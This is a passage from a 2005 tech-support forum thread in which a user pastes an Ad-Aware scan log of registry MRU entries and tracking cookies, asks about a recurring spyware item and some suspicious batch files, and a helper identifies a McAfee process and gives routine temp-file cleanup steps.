    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\mediaplayer\player\recentfilelist
    Description : list of recently used files in microsoft windows media player

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\internet explorer
    Description : last download directory used in microsoft internet explorer

    MRU List Object Recognized!
    Location: : software\microsoft\directdraw\mostrecentapplication
    Description : most recent application to use microsoft directdraw

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\microsoft management console\recent file list
    Description : list of recent snap-ins used in the microsoft management console

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\internet explorer\typedurls
    Description : list of recently entered addresses in microsoft internet explorer

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\adobe\acrobat reader\5.0\avgeneral\crecentfiles
    Description : list of recently used files in adobe reader


    MRU List Object Recognized!
    Location: : software\microsoft\direct3d\mostrecentapplication
    Description : most recent application to use microsoft direct3d

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\mediaplayer\preferences
    Description : last playlist index loaded in microsoft windows media player

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\applets\regedit
    Description : last key accessed using the microsoft registry editor

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\mediaplayer\preferences
    Description : last playlist loaded in microsoft windows media player

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\common\general
    Description : list of recently used symbols in microsoft office

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\powerpoint\recent typeface list
    Description : list of recently used typefaces in microsoft powerpoint

    MRU List Object Recognized!
    Location: : software\microsoft\direct3d\mostrecentapplication
    Description : most recent application to use microsoft direct X

    MRU List Object Recognized!
    Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows media\wmsdk\general
    Description : windows media sdk

    MRU List Object Recognized!
    Location: : C:\Documents and Settings\Matt\Application Data\microsoft\office\recent
    Description : list of recently opened documents using microsoft office

    MRU List Object Recognized!
    Location: : C:\Documents and Settings\Matt\recent
    Description : list of recently opened documents

    Started Tracking Cookie scan
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@server.iad.liveperson[2].txt
    Category : Data Miner
    Comment : Hits:12
    Value : Cookie:matt@server.iad.liveperson.net/
    Expires : 2-15-2006 1:59:46 PM
    LastSync : Hits:12
    UseCount : 0
    Hits : 12

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@atdmt[1].txt
    Category : Data Miner
    Comment : Hits:1
    Value : Cookie:matt@atdmt.com/
    Expires : 2-12-2010 6:00:00 PM
    LastSync : Hits:1
    UseCount : 0
    Hits : 1

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@statcounter[1].txt
    Category : Data Miner
    Comment : Hits:1
    Value : Cookie:matt@statcounter.com/
    Expires : 2-14-2010 4:51:40 PM
    LastSync : Hits:1
    UseCount : 0
    Hits : 1

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@counter2.hitslink[2].txt
    Category : Data Miner
    Comment : Hits:8
    Value : Cookie:matt@counter2.hitslink.com/
    Expires : 1-17-2038 11:00:00 PM
    LastSync : Hits:8
    UseCount : 0
    Hits : 8

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@2o7[1].txt
    Category : Data Miner
    Comment : Hits:3
    Value : Cookie:matt@2o7.net/
    Expires : 2-12-2010 12:17:08 PM
    LastSync : Hits:3
    UseCount : 0
    Hits : 3

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@advertising[1].txt
    Category : Data Miner
    Comment : Hits:4
    Value : Cookie:matt@advertising.com/
    Expires : 2-14-2010 9:04:30 AM
    LastSync : Hits:4
    UseCount : 0
    Hits : 4

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@S111319[1].txt
    Category : Data Miner
    Comment : Hits:4
    Value : Cookie:matt@statse.webtrendslive.com/S111319
    Expires : 12-31-2020 2:00:00 AM
    LastSync : Hits:4
    UseCount : 0
    Hits : 4

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@servedby.advertising[2].txt
    Category : Data Miner
    Comment : Hits:21
    Value : Cookie:matt@servedby.advertising.com/
    Expires : 3-17-2005 9:04:30 AM
    LastSync : Hits:21
    UseCount : 0
    Hits : 21

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@hitbox[1].txt
    Category : Data Miner
    Comment : Hits:3
    Value : Cookie:matt@hitbox.com/
    Expires : 2-15-2006 8:30:24 AM
    LastSync : Hits:3
    UseCount : 0
    Hits : 3

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@mediaplex[1].txt
    Category : Data Miner
    Comment : Hits:2
    Value : Cookie:matt@mediaplex.com/
    Expires : 6-21-2009 6:00:00 PM
    LastSync : Hits:2
    UseCount : 0
    Hits : 2

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@dcsgcxwngpifwznfzlmv83o6w_5w4m[2].txt
    Category : Data Miner
    Comment : Hits:3
    Value : Cookie:matt@statse.webtrendslive.com/dcsgcxwngpifwznfzlmv83o6w_5w4m
    Expires : 2-11-2015 6:18:26 PM
    LastSync : Hits:3
    UseCount : 0
    Hits : 3

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : matt@ehg-cbs.hitbox[1].txt
    Category : Data Miner
    Comment : Hits:1
    Value : Cookie:matt@ehg-cbs.hitbox.com/
    Expires : 2-15-2006 8:30:24 AM
    LastSync : Hits:1
    UseCount : 0
    Hits : 1

    Tracking cookie scan result:
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
    New critical objects: 12
    Objects found so far: 40

    Deep scanning and examining files (C:)
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

    Tracking Cookie Object Recognized!
    Type : IECache Entry
    Data : natalie@atdmt[2].txt
    Category : Data Miner
    Comment :
    Value : C:\Documents and Settings\Natalie\Cookies\natalie@atdmt[2].txt

    Disk Scan Result for C:\
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
    New critical objects: 0
    Objects found so far: 41


    Scanning Hosts file......
    Hosts file location:"C:\WINDOWS\system32\drivers\etc\hosts".
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

    Hosts file scan result:
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
    1 entries scanned.
    New critical objects:0
    Objects found so far: 41

    Performing conditional scans...
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

    Conditional scan result:
    »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
    New critical objects: 0
    Objects found so far: 41

    1:12:45 AM Scan Complete

    **********************************************

    Note that SinstantM shows on the Ad-Aware scan (process #49). I deleted that BEFORE I ran that scan, and did it from Safe Mode. It somehow came back, I deleted it again, it came back again and showed in the HJT scan I did right before I posted this. I checked it and clicked "Fix", and it went buh-bye, not showing in the scan I pasted into this message. I hope it's gone forever this time...

    I can't thank you enough for your help. This day was pretty much a total loss as far as work was concerned, but I have a feeling that there won't be many more of these days after what I've learned from today's little adventure.

    Take care, and keep doin what you're doin... There aren't enough folks in the world like the guys in this forum...:rockon:

    Matt
  • edited February 2005
    A couple other things I wanted to mention...

    Once, during one of the many reboots I did over the course of the day yesterday, I was shutting down and a bunch of programs were not responding, showing error messages with the "End Now" button, and one of those programs was called "##VSO###MCUHSSHLD##". :confused: I tried searching for that later, but found nothing. Is that some kind of abbreviation for a legitimate program, or is something actually called that within one of the spyware instances that I got rid of? :scratch:

    Also, I found two batch files that I wasn't too sure of:

    r.bat, which was in C:\Docs&Set\Matt\Local Settings\Temp

    I've since put it in a quarantine folder there...

    x.bat, I can't remember where this one was...

    Any ideas?

    Thanks again,
    Matt
  • Buckeye_Sam Columbus, Ohio
    edited February 2005
    ##VSO###MCUHSSHLD##
    This is related to McAfee antivirus. Are you still getting these errors? Is your antivirus loading up and running ok?


    Delete temp files

    Navigate to the C:\Windows\Temp folder. Open the Temp folder and go to Edit > Select All then Edit > Delete to delete the entire contents of the Temp folder.

    Navigate to the C:\Windows\Prefetch folder. Open the Prefetch folder and go to Edit > Select All then Edit > Delete to delete the entire contents of the Prefetch folder.

    Go to Start > Run and type %temp% in the Run box. The Temp folder will open. Click Edit > Select All then Edit > Delete to delete the entire contents of the Temp folder.

    Finally go to Control Panel > Internet Options. On the General tab under "Temporary Internet Files" Click "Delete Files". Put a check by "Delete Offline Content" and click OK. Click on the Programs tab then click the "Reset Web Settings" button. Click Apply then OK.

    Empty the Recycle Bin.



    Your log looks clean to me, but let me know how things are working on your end.